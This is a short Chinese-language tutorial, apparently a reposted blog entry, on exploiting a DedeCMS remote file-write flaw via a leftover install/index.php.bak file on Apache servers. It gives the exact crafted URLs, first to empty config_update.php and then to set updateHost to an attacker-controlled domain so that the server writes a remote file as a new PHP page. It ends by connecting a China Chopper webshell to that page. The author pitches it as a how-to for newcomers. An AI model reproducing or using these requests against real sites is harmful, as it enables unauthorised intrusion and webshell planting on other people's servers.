Dedecms远程写文件漏洞和利用方法

admin

转载备份

首先这个漏洞呢是上个月国外公布，虽然已经公布了但是我想可能有些人还不知道或者不会利用，在下就来做个利用教程  照顾一下新手   分析地址：https://www.chinabaiker.com/thread-2119-1-1.html 服务器的环境必须要是 阿帕奇 的  因为次漏洞利用了阿帕奇的解析漏洞 漏洞文件 ： 1:install/index.php.bak 2:install/index.php 安装文件有两个 下面呢我找了一个网站给大家演示 Xxx.com/install/index.php.bak 文件存在   接下来就是清空config_update.php的内容 Xxx.com/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php   就是把http://updatenew.dedecms.com/base-v57/dedecms/demodata.a.txt 这里面的内容写入xxx.com/data/admin/config_update.php 远程获取失败就是http://updatenew.dedecms.com/base-v57/dedecms/demodata.a.txt 的文件不存在   接下来就开始写指定内容了   Xxx.com/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../sss1.php&updateHost=http://locett.xyz/ 存在 就是http://locett.xyz//dedecms/demodata.a.txt存在 大家可能会问http://locett.xyz/ 是啥   因为他要写url/dedecms/demodata.a.txt里面的内容进去   所以我们指定网址http://locett.xyz/ 他就会写http://locett.xyz//dedecms/demodata.a.txt里面的内容    接下来我们看一下是写入成功 OK  菜刀连接

好像还不错的样子呢。。。。